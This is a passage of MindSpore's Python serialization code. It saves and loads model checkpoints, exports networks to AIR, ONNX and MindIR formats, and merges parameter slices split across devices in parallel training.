"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
TOTAL_SAVE = 1024 * 1024
def _special_process_par(par, new_par):
"""
Processes the special condition.
Like (12,2048,1,1)->(12,2048), this case is caused by GE 4 dimensions tensor.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsistent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute the process of saving checkpoint into file."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tobytes()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
save_obj (Union[Cell, list]): The cell object or data list(each element is a dictionary, like
[{"name": param_name, "data": param_data},...], the type of
param_name would be string, and the type of param_data would
be parameter or `Tensor`).
ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
integrated_save (bool): Whether to integrated save in automatic model parallel scene. Default: True
async_save (bool): Whether asynchronous execution saves the checkpoint to a file. Default: False
Raises:
TypeError: If the parameter save_obj is not `nn.Cell` or list type. And if the parameter
`integrated_save` and `async_save` are not bool type.
"""
if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
integrated_save = Validator.check_bool(integrated_save)
async_save = Validator.check_bool(async_save)
logger.info("Execute the process of saving checkpoint files.")
if isinstance(save_obj, nn.Cell):
save_obj.init_parameters_data()
param_dict = {}
for _, param in save_obj.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
param_data = Tensor(value.data)
# in automatic model parallel scenario, some parameters were spliteds to all the devices,
# which should be combined before saving
if key in save_obj.parameter_layout_dict:
param_data = _get_merged_param_data(save_obj, key, param_data, integrated_save)
each_param["data"] = param_data
param_list.append(each_param)
save_obj = param_list
data_list = {}
with _ckpt_mutex:
for param in save_obj:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Saving checkpoint process is finished.")
def _check_param_prefix(filter_prefix, param_name):
"""Checks whether the prefix of parameter name matches the given filter_prefix."""
for prefix in filter_prefix:
if param_name.find(prefix) == 0 \
and (param_name == prefix or param_name[len(prefix)] == "." or (prefix and prefix[-1] == ".")):
return True
return False
def load(file_name):
"""
Load MindIR.
The returned object can be executed by a `GraphCell`. However, there are some limitations to the current use
of `GraphCell`, see class :class:`mindspore.nn.GraphCell` for more details.
Args:
file_name (str): MindIR file name.
Returns:
Object, a compiled graph that can executed by `GraphCell`.
Raises:
ValueError: MindIR file is incorrect.
Examples:
>>> import numpy as np
>>> import mindspore.nn as nn
>>> from mindspore import Tensor
>>> from mindspore.train import export, load
>>>
>>> net = nn.Conv2d(1, 1, kernel_size=3)
>>> input = Tensor(np.ones([1, 1, 3, 3]).astype(np.float32))
>>> export(net, input, file_name="net", file_format="MINDIR")
>>> graph = load("net.mindir")
>>> net = nn.GraphCell(graph)
>>> output = net(input)
"""
if not isinstance(file_name, str):
raise ValueError("The file name must be string.")
if not os.path.exists(file_name):
raise ValueError("The file is not exist.")
if not file_name.endswith(".mindir"):
raise ValueError("The MindIR should end with mindir, please input the correct file name.")
logger.info("Execute the process of loading mindir.")
graph = load_mindir(file_name)
if graph is None:
raise RuntimeError("Load MindIR failed.")
return graph
def load_checkpoint(ckpt_file_name, net=None, strict_load=False, filter_prefix=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
strict_load (bool): Whether to strict load the parameter into net. If False, it will load parameter
in the param_dict into net with the same suffix. Default: False
filter_prefix (Union[str, list[str], tuple[str]]): Parameters starting with the filter_prefix
will not be loaded. Default: None.
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
Examples:
>>> from mindspore import load_checkpoint
>>>
>>> ckpt_file_name = "./checkpoint/LeNet5-1_32.ckpt"
>>> param_dict = load_checkpoint(ckpt_file_name, filter_prefix="conv1")
"""
ckpt_file_name, filter_prefix = _check_checkpoint_param(ckpt_file_name, filter_prefix)
logger.info("Execute the process of loading checkpoint files.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
param_data_list = []
for element_id, element in enumerate(checkpoint_list.value):
if filter_prefix is not None and _check_param_prefix(filter_prefix, element.tag):
continue
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
logger.info("Loading checkpoint files process is finished.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if not parameter_dict:
raise ValueError(f"The loaded parameter dict is empty after filtering, please check filter_prefix.")
if net is not None:
load_param_into_net(net, parameter_dict, strict_load)
return parameter_dict
def _check_checkpoint_param(ckpt_file_name, filter_prefix=None):
"""Check function load_checkpoint's parameter."""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if filter_prefix is not None:
if not isinstance(filter_prefix, (str, list, tuple)):
raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str] "
f"when filter_prefix is not None, but got {str(type(filter_prefix))}.")
if isinstance(filter_prefix, str):
filter_prefix = (filter_prefix,)
if not filter_prefix:
raise ValueError("The filter_prefix can't be empty when filter_prefix is list or tuple.")
for index, prefix in enumerate(filter_prefix):
if not isinstance(prefix, str):
raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str], "
f"but got {str(type(prefix))} at index {index}.")
return ckpt_file_name, filter_prefix
def load_param_into_net(net, parameter_dict, strict_load=False):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dictionary.
strict_load (bool): Whether to strict load the parameter into net. If False, it will load parameter
in the param_dict into net with the same suffix. Default: False
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dictionary.
Examples:
>>> from mindspore import load_checkpoint, load_param_into_net
>>>
>>> net = Net()
>>> ckpt_file_name = "./checkpoint/LeNet5-1_32.ckpt"
>>> param_dict = load_checkpoint(ckpt_file_name, filter_prefix="conv1")
>>> param_not_load = load_param_into_net(net, param_dict)
>>> print(param_not_load)
['conv1.weight']
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
strict_load = Validator.check_bool(strict_load)
logger.info("Execute the process of loading parameters into net.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load and not strict_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Loading parameters into net is finished.")
if param_not_load:
logger.warning("{} parameters in the net are not loaded.".format(len(param_not_load)))
return param_not_load
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute the process of saving graph.")
graph_pb = network.get_func_graph_proto()
if graph_pb:
with open(file_name, "wb") as f:
os.chmod(file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(graph_pb)
def _get_merged_param_data(net, param_name, param_data, integrated_save):
"""
Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name (str): The parameter name, which to be combined.
param_data (Tensor): The parameter data on the local device, which was a slice of the whole parameter data.
integrated_save (bool): Whether to integrated save in automatic model parallel scene.
Returns:
Tensor, the combined tensor which with the whole data value.
"""
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
layout = net.parameter_layout_dict[param_name]
if len(layout) < 6:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
uniform_split = layout[4]
opt_shard_group = layout[5]
allgather_net = None
if param_name in net.parallel_parameter_merge_net_dict:
allgather_net = net.parallel_parameter_merge_net_dict[param_name]
else:
logger.info("need to create allgather net for %s", param_name)
if integrated_save:
if uniform_split == 0:
raise RuntimeError("Integrated save checkpoint only support uniform split tensor now.")
# while any dim is not equal to -1, means param is split and needs to be merged
# pipeline parallel need to be supported here later
for dim in tensor_map:
if dim != -1:
if allgather_net is None:
if opt_shard_group:
allgather_net = get_allgather_cell(opt_shard_group, True)
else:
allgather_net = get_allgather_cell(opt_shard_group, False)
net.parallel_parameter_merge_net_dict[param_name] = allgather_net
param_data = allgather_net(param_data)
if field_size:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
if opt_shard_group:
if allgather_net is None:
allgather_net = get_allgather_cell(opt_shard_group, False)
net.parallel_parameter_merge_net_dict[param_name] = allgather_net
param_data = allgather_net(param_data)
elif opt_shard_group:
if allgather_net is None:
allgather_net = get_allgather_cell(opt_shard_group, False)
net.parallel_parameter_merge_net_dict[param_name] = allgather_net
param_data = allgather_net(param_data)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='AIR', **kwargs):
"""
Export the MindSpore prediction model to a file in the specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of the model to be exported.
file_format (str): MindSpore currently supports 'AIR', 'ONNX' and 'MINDIR' format for exported model.
- AIR: Ascend Intermediate Representation. An intermediate representation format of Ascend model.
Recommended suffix for output file is '.air'.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
Recommended suffix for output file is '.onnx'.
- MINDIR: MindSpore Native Intermediate Representation for Anf. An intermediate representation format
for MindSpore models.
Recommended suffix for output file is '.mindir'.
kwargs (dict): Configuration options dictionary.
- quant_mode: The mode of quant.
- mean: Input data mean. Default: 127.5.
- std_dev: Input data variance. Default: 127.5.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if not isinstance(file_name, str):
raise ValueError("Args file_name {} must be string, please check it".format(file_name))
Validator.check_file_name_by_regular(file_name)
net = _quant_export(net, *inputs, file_format=file_format, **kwargs)
_export(net, file_name, file_format, *inputs)
def _export(net, file_name, file_format, *inputs):
"""
It is an internal conversion function. Export the MindSpore prediction model to a file in the specified format.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
if file_format == 'GEIR':
logger.warning(f"Format 'GEIR' is deprecated, it would be removed in future release, use 'AIR' instead.")
file_format = 'AIR'
supported_formats = ['AIR', 'ONNX', 'MINDIR']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# When dumping ONNX file, switch network mode to infer when it is training(NOTE: ONNX only designed for prediction)
is_dump_onnx_in_training = net.training and file_format == 'ONNX'
if is_dump_onnx_in_training:
net.set_train(mode=False)
if file_format == 'AIR':
phase_name = 'export.air'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
if not file_name.endswith('.air'):
file_name += ".air"
_executor.export(file_name, graph_id)
elif file_format == 'ONNX':
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(net, graph_id)
if not file_name.endswith('.onnx'):
file_name += ".onnx"
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(onnx_stream)
elif file_format == 'MINDIR':
_save_mindir(net, file_name, *inputs)
if is_dump_onnx_in_training:
net.set_train(mode=True)
def _save_mindir(net, file_name, *inputs):
"""Save MindIR format file."""
model = mindir_model()
if net._auto_parallel_mode:
phase_name = "predict"
else:
phase_name = 'export.mindir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name,
do_convert=False, auto_parallel_mode=net._auto_parallel_mode)
mindir_stream = _executor._get_func_graph_proto(net, graph_id, 'mind_ir')
net_dict = net.parameters_dict()
data_total = 0
save_together = True
model.ParseFromString(mindir_stream)
for param_proto in model.graph.parameter:
name = param_proto.name[param_proto.name.find(":") + 1:]
if name in net_dict.keys():
data_total += sys.getsizeof(net_dict[name].data.asnumpy().tobytes()) / 1024
else:
raise RuntimeError('Graph parameter: {} Undefined in network.'.format(param_proto.name))
if data_total > TOTAL_SAVE:
save_together = False
break
if save_together:
for param_proto in model.graph.parameter:
param_name = param_proto.name[param_proto.name.find(":")+1:]
if param_name in net_dict.keys():
param_data = net_dict[param_name].data.asnumpy().tobytes()
param_proto.raw_data = param_data
else:
logger.error("The parameter %s in the graph are not in the network.", param_name)
raise ValueError("The parameter in the graph must in the network.")
if not file_name.endswith('.mindir'):
file_name += ".mindir"
current_path = os.path.abspath(file_name)
dirname = os.path.dirname(current_path)
os.makedirs(dirname, exist_ok=True)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(model.SerializeToString())
else:
logger.warning("Parameters in the net capacity exceeds 1G, save MindIR model and parameters separately.")
# save parameter
file_prefix = file_name.split("/")[-1]
if file_prefix.endswith(".mindir"):
file_prefix = file_prefix[:-7]
current_path = os.path.abspath(file_name)
dirname = os.path.dirname(current_path)
data_path = dirname + "/" + file_prefix + "_variables"
if os.path.exists(data_path):
shutil.rmtree(data_path)
os.makedirs(data_path, exist_ok=True)
os.chmod(data_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
index = 0
graphproto = graph_proto()
data_size = 0
for name, param in net_dict.items():
for param_proto in model.graph.parameter:
if name == param_proto.name[param_proto.name.find(":") + 1:]:
parameter = graphproto.parameter.add()
parameter.name = param_proto.name
parameter.data_type = param_proto.data_type
for dim in param_proto.dims:
parameter.dims.append(dim)
byte_data = param.data.asnumpy().tobytes()
parameter.raw_data = byte_data
data_size += sys.getsizeof(byte_data) / 1024
break
if data_size > TOTAL_SAVE:
data_file_name = data_path + "/" + "data_" + str(index)
with open(data_file_name, "ab") as f:
os.chmod(data_file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(graphproto.SerializeToString())
index += 1
data_size = 0
del graphproto.parameter[:]
if graphproto.parameter:
data_file_name = data_path + "/" + "data_" + str(index)
with open(data_file_name, "ab") as f:
os.chmod(data_file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(graphproto.SerializeToString())
# save graph
del model.graph.parameter[:]
graph_file_name = dirname + "/" + file_prefix + "_graph.mindir"
with open(graph_file_name, 'wb') as f:
os.chmod(graph_file_name, stat.S_IRUSR | stat.S_IWUSR)
f.write(model.SerializeToString())
def _quant_export(network, *inputs, file_format, **kwargs):
"""
Exports MindSpore quantization predict model to deploy with AIR and MINDIR.
"""
if not kwargs.get('quant_mode', None):
return network
supported_device = ["Ascend", "GPU"]
supported_formats = ['AIR', 'MINDIR']
quant_mode_formats = ['AUTO', 'MANUAL']
mean = 127.5 if kwargs.get('mean', None) is None else kwargs['mean']
std_dev = 127.5 if kwargs.get('std_dev', None) is None else kwargs['std_dev']
quant_mode = kwargs['quant_mode']
if quant_mode not in quant_mode_formats:
raise KeyError(f'Quant_mode input is wrong, Please choose the right mode of the quant_mode.')
mean = Validator.check_value_type("mean", mean, (int, float))
std_dev = Validator.check_value_type("std_dev", std_dev, (int, float))
if context.get_context('device_target') not in supported_device:
raise KeyError("Unsupported {} device target.".format(context.get_context('device_target')))
if file_format not in supported_formats:
raise ValueError('Illegal file format {}.'.format(file_format))
network.set_train(False)
if file_format == "MINDIR":
if quant_mode == 'MANUAL':
exporter = quant_export.ExportManualQuantNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
exporter = quant_export.ExportToQuantInferNetwork(network, mean, std_dev, *inputs, is_mindir=True)
else:
if quant_mode == 'MANUAL':
exporter = quant_export.ExportManualQuantNetwork(network, mean, std_dev, *inputs)
else:
exporter = quant_export.ExportToQuantInferNetwork(network, mean, std_dev, *inputs)
deploy_net = exporter.run()
return deploy_net
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of saved print data.
Returns:
List, element of list is Tensor.
Raises:
ValueError: The print file may be empty, please make sure enter the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.fromstring(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
# Scale type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
"""
Merge data slices to one tensor with whole data when strategy is not None.
Args:
sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
parameter_name (str): Name of parameter.
strategy (dict): Parameter slice strategy.
is_even (bool): Slice manner that True represents slicing evenly and False represents slicing unevenly.
Returns:
Tensor, the merged Tensor which has the whole data.
Raises:
ValueError: Failed to merge.
"""
layout = strategy.get(parameter_name)
try:
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
except BaseException as e:
raise ValueError(f"{e.__str__()}. Please make sure that strategy matches the node_strategy.proto.")
device_count = 1
for dim in dev_mat:
device_count *= dim
if len(sliced_data) != device_count:
raise ValueError(f"The sliced_parameters length should be equal to device_count. "
f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
merged_tensor = None
if not param_split_shape:
if not is_even:
raise ValueError("The shape of every parameter in sliced_parameters should be the same "
"when slice manner is even.")
all_gather_tensor = Tensor(np.concatenate(sliced_data))
if field_size > 0:
from mindspore.parallel._tensor import _reshape_param_data_with_weight
merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, field_size)
else:
from mindspore.parallel._tensor import _reshape_param_data
merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
else:
from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
slice_count = 1
for dim in tensor_strategy:
slice_count *= dim
if len(param_split_shape) != slice_count:
raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
f"but got {len(param_split_shape)}.")
tensor_slices_new = list(range(slice_count))
tensor_slices = sliced_data
for i in range(device_count):
slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
f"but got {tensor_slices[i].shape[0]}.")
tensor_slices_new[slice_index] = np.array(tensor_slices[i])
dim_len = len(tensor_strategy)
for i in range(dim_len):
ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
tensor_slices_new_inner = []
for j in range(ele_count):
new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
(j + 1) * tensor_strategy[dim_len - 1 - i]):
new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
tensor_slices_new = tensor_slices_new_inner
merged_tensor = Tensor(tensor_slices_new[0])
return merged_tensor
def build_searched_strategy(strategy_filename):
"""
Build strategy of every parameter in network.
Args:
strategy_filename (str): Name of strategy file.
Returns:
Dictionary, whose key is parameter name and value is slice strategy of this parameter.
Raises:
ValueError: Strategy file is incorrect.
TypeError: Strategy_filename is not str.
"""
if not isinstance(strategy_filename, str):
raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
if not os.path.isfile(strategy_filename):
raise ValueError(f"No such strategy file: {strategy_filename}.")
if os.path.getsize(strategy_filename) == 0:
raise ValueError("The strategy file should not be empty.")
parallel_strategy_map = ParallelStrategyMap()
with open(strategy_filename, 'rb') as f:
pb_content = f.read()
parallel_strategy_map.ParseFromString(pb_content)
layout_items = parallel_strategy_map.parallel_layout_item
if not layout_items:
raise ValueError("The strategy file has no sliced parameter.")
strategy = {}
for layout_item in layout_items:
parameter_name = layout_item.param_name
layout = layout_item.parallel_layouts
strategy[parameter_name] = layout
return strategy
def merge_sliced_parameter(sliced_parameters, strategy=None):
"""
Merge parameter slices to one whole parameter.
Args:
sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
strategy (Optional[dict]): Parameter slice strategy, whose key is parameter name and
value is slice strategy of this parameter. If strategy is None, just merge
parameter slices in 0 axis order. Default: None.
Returns:
Parameter, the merged parameter which has the whole data.
Raises:
ValueError: Failed to merge.
TypeError: The sliced_parameters is incorrect or strategy is not dict.
KeyError: The parameter name is not in keys of strategy.
Examples:
>>> from mindspore.common.parameter import Parameter
>>> from mindspore.train import merge_sliced_parameter
>>>
>>> sliced_parameters = [
... Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
... "network.embedding_table"),
... Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
... "network.embedding_table"),
... Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
... "network.embedding_table"),
... Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
... "network.embedding_table")]
>>> merged_parameter = merge_sliced_parameter(sliced_parameters)
"""
if not isinstance(sliced_parameters, list):
raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
if not sliced_parameters:
raise ValueError("The sliced_parameters should not be empty.")
if strategy and not isinstance(strategy, dict):
raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
try:
parameter_name = sliced_parameters[0].name
parameter_shape = sliced_parameters[0].data.shape
parameter_shape_length = len(parameter_shape)
except BaseException as e:
raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
is_even = True
for index, parameter in enumerate(sliced_parameters):
if not isinstance(parameter, Parameter):
raise TypeError(f"The element in sliced_parameters should be Parameter, "
f"but got {type(parameter)} at index {index}.")
if parameter.name != parameter_name \
or len(parameter.data.shape) != parameter_shape_length \
or parameter.data.shape[1:] != parameter_shape[1:]:
raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
"dimension length and shape except 0 axis")
if parameter.data.shape != parameter_shape:
is_even = False
layerwise_parallel = sliced_parameters[0].layerwise_parallel
requires_grad = sliced_parameters[0].requires_grad
sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
merged_parameter = None
if not strategy:
merged_tensor = Tensor(np.concatenate(sliced_data))
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
else:
if parameter_name not in strategy.keys():
raise KeyError(f"The parameter name should be one key of strategy. "
